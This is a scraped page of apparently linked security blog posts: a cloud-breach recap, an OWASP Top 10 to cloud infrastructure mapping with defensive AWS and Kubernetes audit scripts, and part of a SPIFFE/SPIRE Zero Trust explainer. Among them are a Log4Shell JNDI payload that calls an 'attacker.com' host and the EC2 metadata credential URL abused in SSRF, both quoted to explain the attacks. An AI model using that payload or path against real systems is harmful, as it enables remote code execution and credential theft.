│  The artifact you install is legitimate — and malicious.        │
│  Incidents: SolarWinds, XZ Utils, Log4Shell (component)         │
│                                                                 │
│  ROOT CAUSE 3: MISCONFIGURATION                                  │
│  An access control is wrong. A resource is exposed that         │
│  shouldn't be. An encryption requirement is missing.            │
│  No attacker capability required — just knowledge of the gap.   │
│  Incidents: Capital One (S3 + IAM), public buckets broadly      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Your purple team exercise backlog should cover all three. The remaining episodes in this series address each one:

  • Identity: EP05 (MFA fatigue), EP10 (cross-account lateral movement)
  • Supply chain: EP06 (CI/CD secrets), EP09 (SolarWinds to XZ Utils)
  • Misconfiguration: EP04 (broken access control in AWS), EP07 (SSRF/IMDS), EP08 (container escape)

Run This in Your Own Environment: Breach Scenario Self-Assessment

Before starting the technique-specific episodes, run this self-assessment to identify which breach scenario your environment is most exposed to:

#!/bin/bash
# Purple Team EP03 — Breach Exposure Self-Assessment

echo "=== IDENTITY EXPOSURE ==="
echo "--- Users with console access and no MFA ---"
aws iam generate-credential-report > /dev/null 2>&1 && sleep 3
aws iam get-credential-report --query 'Content' --output text | \
  base64 -d | awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "  NO MFA: " $1}'

echo ""
echo "=== SUPPLY CHAIN EXPOSURE ==="
echo "--- Lambda functions with old runtimes (EOL = higher CVE exposure) ---"
aws lambda list-functions \
  --query 'Functions[?Runtime==`python3.8` || Runtime==`nodejs14.x` || Runtime==`java8`].{Name:FunctionName,Runtime:Runtime}' \
  --output table

echo ""
echo "=== MISCONFIGURATION EXPOSURE ==="
echo "--- S3 buckets without account-level public access block ---"
ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
PAB=$(aws s3control get-public-access-block --account-id "$ACCOUNT" 2>/dev/null)
if [ -z "$PAB" ]; then
  echo "  CRITICAL: Account-level S3 public access block is NOT set"
else
  echo "$PAB" | jq '{BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, RestrictPublicBuckets}'
fi

echo ""
echo "--- EC2 instances with IMDSv1 enabled (SSRF risk) ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,State:State.Name}' \
  --output table

⚠ Common Mistakes When Using Breach History as a Training Resource

Assuming “we’re not SolarWinds” means supply chain doesn’t apply. You don’t have to be a software vendor. Your GitHub Actions workflows pull third-party actions. Your Dockerfiles pull base images. Your Lambda functions install pip packages. Every external artifact is a supply chain dependency.

Treating Log4Shell as “old news.” The vulnerability was disclosed in 2021. Organizations are still finding Log4j in unexpected places in 2024 — embedded in monitoring agents, database drivers, and vendor-supplied applications where the dependency tree was never audited.

Responding to Uber/Okta by mandating security awareness training. The Uber breach happened to an experienced contractor who made one decision under social pressure. The structural fix is hardware MFA that cannot be fatigue-attacked — not a training module that adds friction and gets clicked through.

Not correlating your own logs against breach indicators. Every breach in this episode produced specific, searchable indicators: specific CloudTrail event patterns, specific process behaviors, specific network anomalies. If you have historical logs, you can run indicators of compromise against them to see whether your environment would have surfaced those indicators.


Quick Reference

Breach Year OWASP Primary Root Cause Structural Fix
SolarWinds 2020 A08 Supply chain — build pipeline compromise Reproducible builds, build system isolation
Log4Shell 2021 A03, A06 Injection + vulnerable component Patch + dependency inventory
Uber 2022 A07, A02 Identity — MFA fatigue + hardcoded creds Hardware MFA + no hardcoded secrets
CircleCI 2023 A07, A08 Identity — session token theft → CI secret theft OIDC short-lived creds instead of stored secrets
Okta 2023 A07 Identity — support system compromise → token theft Hardware MFA for tier-0, session token rotation
XZ Utils 2024 A08, A06 Supply chain — social engineering → maintainer trust Reproducible builds, artifact signing, SLSA

Key Takeaways

  • Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident is one or more of these
  • SolarWinds and XZ Utils are the same attack class: compromise the build pipeline and sign the result with a trusted key
  • Uber demonstrates that MFA does not prevent breach when the MFA mechanism is push-notification — fatigue + social engineering defeats it
  • CircleCI demonstrates that long-lived secrets stored in a CI/CD platform are only as secure as that platform — OIDC short-lived credentials eliminate the exposure
  • Log4Shell demonstrates that vulnerable transitive dependencies are invisible without active dependency scanning — “we didn’t use Log4j” was wrong for thousands of organizations
  • The attack surface does not change: the same three root causes that caused SolarWinds in 2020 caused XZ Utils in 2024
  • Your purple team exercise backlog should include at least one scenario for each of the three root causes

What’s Next

EP04 starts the technique-specific episodes with broken access control in AWS — the most common OWASP A01 manifestation in cloud infrastructure. The exercise scenario: an S3 bucket with 47 million records, public for six months, with no alert ever firing. We simulate it, detect it, and fix the IAM and S3 configuration so it cannot happen in your account. If you want the full context for AWS IAM privilege escalation paths that broken access control enables, the IAM series EP08 covers that attack chain in detail.

Get EP04 in your inbox when it publishes → subscribe at linuxcent.com

OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureEP03: Cloud security breaches 2020–2025


TL;DR

  • OWASP Top 10 cloud infrastructure mapping shows that every category has a direct cloud-native equivalent — this is not a web-app-only taxonomy
  • A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
  • A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
  • A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
  • A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
  • Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.


Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.


A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.

The Capital One breach (2019, disclosed publicly) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials then accessed 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

aws s3control get-public-access-block --account-id $(aws sts get-caller-identity --query Account --output text)

# Find buckets that override the account-level block
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    if echo "$result" | grep -q '"BlockPublicAcls": false'; then
      echo "PUBLIC ACCESS NOT BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application using Log4j 2.x.

The fix was not “validate user input better.” The fix was patching Log4j and — for SSRF — enforcing IMDSv2 (which requires a PUT request with a session token that a naive SSRF cannot produce).

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container deployed with --privileged: true or allowPrivilegeEscalation: true. A Kubernetes pod without securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed — they were never designed in. The kernel doesn’t enforce namespace isolation when a container has CAP_SYS_ADMIN. The attacker doesn’t exploit a vulnerability — they use capabilities the design granted.

# Find pods running as root or with privileged flag
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    select(
      (.spec.containers[].securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) | 
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: kubectl access with cluster-admin ClusterRoleBinding for the default service account. etcd port 2379 accessible from the pod network. AWS security groups with 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because the defaults in older Kubernetes versions were not secure-by-default. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# Find ClusterRoleBindings that bind cluster-admin to non-system subjects
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The XZ backdoor targeted SSH servers on systems using systemd — it would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu before it was caught five weeks before broad distribution release.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.

# List IAM users with console access but no MFA enrolled
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
docker inspect your-registry/your-image:tag --format='{{.Id}}'
# Compare this digest to the pinned value in your deployment manifest

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

# Verify CloudTrail is logging in all regions
aws cloudtrail describe-trails --include-shadow-trails true \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,Logging:HasCustomEventSelectors}'

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had a SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication — any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was 100 million records exfiltrated.

IMDSv2 requires a PUT request to get a session token before credentials can be retrieved — a SSRF via GET cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

The Series Attack Map: Which Episodes Cover Which Categories

OWASP Category Purple Team Episode
A01 Broken Access Control EP04: Broken access control in AWS
A02 Cryptographic Failures EP06 (partial): CI/CD secrets exposure
A03 Injection EP07: SSRF to cloud metadata
A04 Insecure Design EP08: Kubernetes container escape
A05 Security Misconfiguration EP08: Kubernetes container escape
A06 Vulnerable Components EP09: Supply chain attacks
A07 Authentication Failures EP05: MFA fatigue attacks
A08 SW/Data Integrity EP06: CI/CD secrets exposure, EP09: Supply chain
A09 Logging/Monitoring Failures EP11: Detection engineering with eBPF
A10 SSRF EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A05: Security Misconfiguration ==="
echo "--- GuardDuty status in current region ---"
aws guardduty list-detectors --query 'DetectorIds' --output text || echo "DISABLED"

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report 2>/dev/null
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
echo "--- CloudTrail multi-region trail ---"
aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text || \
  echo "WARN: No multi-region trail"

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The first nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.


Quick Reference

OWASP Cloud Infrastructure Equivalent Detection Tool
A01 IAM wildcards, public S3, broad trust policies AWS Config, CloudTrail
A02 Plaintext secrets in env vars, unencrypted S3 TruffleHog, Macie
A03 SSRF, Log4j JNDI injection WAF logs, CloudTrail IMDS calls
A04 Privileged containers, no seccomp OPA/Gatekeeper, Falco
A05 K8s RBAC defaults, open etcd, open SGs kube-bench, AWS Config
A06 Unpatched base images, transitive CVEs, supply chain Trivy, Grype, SLSA
A07 MFA fatigue, long-lived sessions, stolen tokens GuardDuty, Okta logs
A08 Unsigned images, mutable CI references, build compromise Cosign, SLSA, OIDC
A09 No CloudTrail, no GuardDuty, no runtime telemetry AWS Security Hub
A10 IMDSv1 on EC2, SSRF to internal endpoints VPC Flow Logs, CloudTrail

Key Takeaways

  • OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
  • A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
  • A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
  • A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
  • A09 (Logging/Monitoring) is the category that turns the other nine from “detectable breach” into “11-day dwell time”
  • Fixing A01–A08 without A09 means you improve your controls but still won’t know when they’re bypassed
  • Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through April 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes — identity, supply chain, misconfiguration — and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.

Get EP03 in your inbox when it publishes → subscribe at linuxcent.com

Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification

Reading Time: 7 minutes

The Identity Stack, Episode 13
EP12: Entra ID + LinuxEP13


TL;DR

  • Zero Trust means “never trust, always verify” — identity is verified continuously, not just at login time; network location provides no implicit trust
  • Human identity (users) and workload identity (services, pods, jobs) are separate problems — LDAP/Kerberos/OIDC solve the human side; SPIFFE/SPIRE solve the workload side
  • SPIFFE (Secure Production Identity Framework For Everyone) defines a standard for workload identity — a SPIFFE ID is a URI like spiffe://corp.com/ns/prod/sa/payments-svc
  • SPIRE (SPIFFE Runtime Environment) issues short-lived X.509 SVIDs (SPIFFE Verifiable Identity Documents) to workloads — certificates that rotate automatically, every hour
  • mTLS (mutual TLS) is how workloads prove identity to each other — both sides present certificates; no passwords, no API keys
  • The evolution: /etc/passwd (1970) → NIS → LDAP → Kerberos → SAML → OIDC → SPIFFE/SPIRE — the problem has always been the same; the trust boundary keeps moving outward

The Big Picture: From /etc/passwd to Zero Trust

1970s  /etc/passwd              ← trust: the local machine
       One machine, one user list

1984   NIS / Yellow Pages       ← trust: the local network
       Centralized, but cleartext, flat

1993   LDAP                     ← trust: the directory server
       Hierarchical, scalable, encrypted (eventually)

1988   Kerberos                 ← trust: the KDC
       Tickets instead of passwords, network-wide

2002   SAML                     ← trust: the IdP assertion
       Identity crosses the internet

2014   OIDC / OAuth2            ← trust: the JWT signature
       API-native, mobile-native, developer-native

2017   SPIFFE / SPIRE           ← trust: the workload certificate
       Automated identity for services, not humans

2026   Zero Trust               ← trust: nothing, verify everything
       Continuous verification, short-lived credentials,
       device posture, behavioral signals

EP01 of this series started with the chaos of per-machine /etc/passwd. This episode — EP13 — closes the loop: from that chaos to a model where identity is verified continuously, credentials expire in hours not years, and the network provides no implicit trust.


The Assumption That Zero Trust Rejects

Traditional security assumed: if you’re on the internal network, you’re trusted. A VPN user was treated as equivalent to someone at a desk in the office. A service running on the same Kubernetes node as another service was implicitly trusted.

That assumption broke in practice:

  • Compromised VPN credentials gave attackers full internal access
  • Lateral movement after initial compromise was easy — once inside, everything trusted you
  • Perimeter-based security had no visibility into east-west traffic (service-to-service)

Zero Trust inverts the model: the network provides no trust. Every access request is verified — user or service, internal or external, first request or hundredth. Trust is dynamic, contextual, and short-lived.


Human Zero Trust: Continuous Verification

For human users, Zero Trust extends OIDC and Conditional Access:

Short-lived tokens. Access tokens expire in 1 hour (OIDC standard). Refresh tokens are revocable. A user who is terminated can have their refresh tokens revoked in Entra ID — the next time their app tries to use the refresh token, it fails. The maximum blast radius of a stolen token is bounded by its lifetime.

Device posture. The device the user authenticates from is part of the identity assertion. Conditional Access can require: device is managed (Intune-enrolled), device is compliant (no malware, full-disk encryption enabled, OS patched). A valid user credential from an unmanaged device is denied.

Behavioral signals. Entra ID Identity Protection and similar systems analyze login patterns — unusual location, impossible travel (login from Mumbai, then New York 5 minutes later), unfamiliar device. High-risk sign-ins trigger step-up authentication or are blocked automatically.

Privileged Access Management (PAM). For privileged operations (production shell access, AD admin), Zero Trust adds time-bounded just-in-time access:

Request:  "I need admin access to db01.corp.com for 2 hours to investigate an incident"
Approval: Manager approves via Slack/email/ticketing system
Grant:    Temporary role assignment or password checkout from the PAM vault
Access:   User SSHes with a one-time or time-limited credential
Expire:   Credential automatically revoked after 2 hours
Audit:    Full session recording available for review

CyberArk, BeyondTrust, and HashiCorp Vault implement this model. Vault’s SSH Secrets Engine issues short-lived SSH certificates:

# Request a signed SSH certificate (valid 30 minutes)
vault ssh \
  -role=prod-admin \
  -mode=ca \
  -mount-point=ssh-client-signer \
  [email protected]

# Vault issues a certificate signed by the server's trusted CA
# sshd on db01 trusts that CA — no authorized_keys needed
# Certificate expires in 30 minutes — no cleanup required

Workload Identity: The Non-Human Problem

Services don’t have passwords they can type. A microservice calling another microservice needs to prove its identity — but you can’t give a Kubernetes pod a static API key (it’ll be in a config file, in a git repo, or in a crash dump within 6 months).

Workload identity solves this with short-lived, automatically rotated certificates — the service’s identity is its certificate, issued by a trusted CA, expiring in minutes to hours.

Traditional:                     Zero Trust:
  payments-svc → orders-svc        payments-svc → orders-svc
  Authentication: API key           Authentication: mTLS (X.509 cert)
  "Bearer sk_live_abc123"           cert: spiffe://corp.com/ns/prod/sa/payments-svc
  Rotation: manual (rarely done)    Rotation: automatic, every hour
  Revocation: change the key        Revocation: cert expires; new cert issued
  Audit: "API key was used"         Audit: "spiffe://payments-svc → spiffe://orders-svc"

SPIFFE: The Standard

SPIFFE (Secure Production Identity Framework For Everyone) defines what a workload identity looks like. The core concept is the SPIFFE ID — a URI in the format:

spiffe://<trust-domain>/<workload-path>

Examples:
  spiffe://corp.com/ns/prod/sa/payments-svc
  spiffe://corp.com/region/us-east/service/auth-api
  spiffe://corp.com/k8s/cluster-prod/namespace/payments/pod/payments-svc-abc123

The trust domain (corp.com) is the organizational boundary. The path is the workload identifier — typically encoding namespace, service account, or cluster information.

A SPIFFE ID is embedded in an SVID (SPIFFE Verifiable Identity Document) — either an X.509 certificate (X.509-SVID) or a JWT (JWT-SVID). The X.509-SVID is the standard form: the SPIFFE ID appears in the certificate’s Subject Alternative Name (SAN) field.

X.509 Certificate (SVID):
  Subject: CN=payments-svc
  SAN: URI=spiffe://corp.com/ns/prod/sa/payments-svc
  Validity: 1 hour
  Issuer: SPIRE Intermediate CA
  Signed by: corp.com trust bundle

Any service that has the corp.com trust bundle (the CA certificate chain) can verify that a certificate with spiffe://corp.com/... in the SAN was issued by the authorized CA for that trust domain.


SPIRE: The Runtime

SPIRE (SPIFFE Runtime Environment) is the reference implementation that issues SVIDs to workloads.

SPIRE Server
  ├── Node attestation: verifies the identity of the node/VM
  │   (AWS instance identity document, GCP service account, k8s node SA)
  └── Workload attestation: verifies the identity of the process
      (Kubernetes SA, Unix UID/GID, Docker container labels)
         │
         │ issues X.509 SVIDs (short-lived, auto-rotated)
         ▼
SPIRE Agent (runs on every node)
         │
         │ SPIFFE Workload API (Unix socket)
         ▼
Workload (your service)
  → gets its own certificate
  → gets the trust bundle (CA certs of trusted domains)
  → uses cert for mTLS with other services

The workload fetches its identity via the Workload API socket — no environment variables, no file mounts. The SPIRE Agent pushes new certificates before the old ones expire. Rotation is transparent to the workload.

# On a node with SPIRE Agent running:
# Fetch the SVID for the current workload
spire-agent api fetch x509 \
  -socketPath /run/spire/sockets/agent.sock

# Output shows:
# SPIFFE ID: spiffe://corp.com/ns/prod/sa/payments-svc
# Certificate: (PEM)
# Trust bundle: (PEM of issuing CA chain)
# Expires: 2026-04-27T02:00:00Z (1 hour from now)

mTLS: Both Sides Show ID

Mutual TLS (mTLS) is what makes SPIFFE useful operationally. In standard TLS, only the server presents a certificate — the client just verifies it. In mTLS, both sides present certificates. Both sides verify the other’s certificate against the trust bundle.

payments-svc → orders-svc connection:

TLS handshake:
  payments-svc presents: spiffe://corp.com/ns/prod/sa/payments-svc cert
  orders-svc presents:   spiffe://corp.com/ns/prod/sa/orders-svc cert

  Both verify:
    • cert signed by trusted CA (the corp.com SPIRE CA)
    • cert not expired
    • SPIFFE ID in SAN matches what's expected

  After handshake: encrypted channel, both sides verified
  Authorization: orders-svc checks its policy:
    "is spiffe://corp.com/ns/prod/sa/payments-svc allowed to call /api/orders?"

